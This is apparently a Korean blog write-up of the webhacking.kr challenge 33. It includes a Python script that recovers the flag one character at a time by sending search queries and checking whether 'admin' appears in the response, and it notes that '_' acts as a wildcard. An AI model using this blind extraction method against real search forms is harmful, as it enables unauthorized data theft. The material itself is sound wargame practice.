일단 아무거나 막 검색해보다가 ~을 검색했는데
이게 검색되서 subject가 필터링 되나 했는데 hi를 검색하니
admin이 검색되서 내용 필터링인걸 알게 되었다.
그래서 파이썬으로 값을 계속 넣어서 admin이라는 값이 나오는 문자열만 모으면 될것 같다.
import requests
url = "https://webhacking.kr/challenge/web-33/index.php"
cookie = {'PHPSESSID':'itbee38p8aae7p17kvchcr644b'}
#a = requests.get(url, cookies=cookie)
flag= 'FLAG{'
for i in range(1000):
for j in range(32, 128):
if chr(j)=='%':
continue
search={'search':flag+chr(j)}
a = requests.post(url, data=search, cookies=cookie)
if 'admin' in a.text:
flag+=chr(j)
print(flag)
break
여기서 10분째 제자리길래 와일드 문자때문인것같아서 _을 }로 바꿔서 flag를 인증하니까 성공했다
'Hacking > Webhacking.kr' 카테고리의 다른 글
| Webhacking.kr - 34 (0) | 2021.06.01 |
|---|---|
| Webhacking.kr - 4 (0) | 2021.06.01 |
| webhacking.kr - 61 (0) | 2021.05.28 |
| Webhacking.kr - 59 (0) | 2021.05.28 |
| Webhacking.kr - 42 (0) | 2021.05.28 |